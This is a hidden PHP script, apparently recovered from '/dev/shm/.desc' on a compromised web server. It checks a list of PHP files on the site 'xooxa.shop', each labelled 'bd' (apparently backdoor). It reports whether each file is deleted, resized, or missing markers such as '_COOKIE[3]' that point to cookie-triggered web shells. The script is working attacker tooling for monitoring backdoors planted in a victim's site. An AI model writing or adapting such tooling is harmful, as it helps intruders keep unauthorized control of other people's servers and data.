Current File : //proc/thread-self/root/proc/self/root/proc/self/root/dev/shm/.desc
<?php   $r = '/home/siadqowq/xooxa.shop'; $x = ["/mm3.php"=>"bd@@67137540@@2176",
"/admin.php"=>"bd@@66345736@@613",
"/mod.php"=>"bd@@66263818@@1732",
"/cache_forums.php"=>"bd@@66435596@@1738",
"/rsform.php"=>"bd@@66345501@@66",
"/cache_forums.php"=>"bd@@67050023@@token_parser_engine",
"/404SEF_cpanel.php"=>"bd@@39942195@@_COOKIE[3]",
"/configuration.php"=>"bd@@66782791@@_COOKIE[3]",
"/mm3_panel.php"=>"bd@@66908489@@1977",
"/usergroup_11.php"=>"bd@@66610774@@596",
"/admin.php"=>"bd@@66372438@@50",
"/view.php"=>"bd@@67050350@@687",
"/usergroup.php"=>"bd@@67137171@@_COOKIE[3]",
"/index_download.php"=>"bd@@66339998@@23",
"/mod.php"=>"bd@@66284205@@76",
"/cache.php"=>"bd@@67049916@@1",
"/usergroup_11.php"=>"bd@@67137470@@48",
"/rsform.php"=>"bd@@66305487@@2419",
"/mm3_panel.php"=>"bd@@67137496@@system_core",
"/extension.php"=>"bd@@66386139@@dependency_resolver",
"/change.php"=>"bd@@67050220@@16",
"/404SEF_cpanel.php"=>"bd@@39930350@@602",
"/menu1.php"=>"bd@@67137519@@2",
"/404SEF.php"=>"bd@@57479418@@_COOKIE[3]",
"/change_pass2.php"=>"bd@@67049756@@$_COOKIE[3",
"/functions.php"=>"bd@@66907938@@$_COOKIE[5",
"/zapfdingbats.php"=>"bd@@66263597@@$_COOKIE[-",
"/change.php"=>"ui@@197522@@68"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');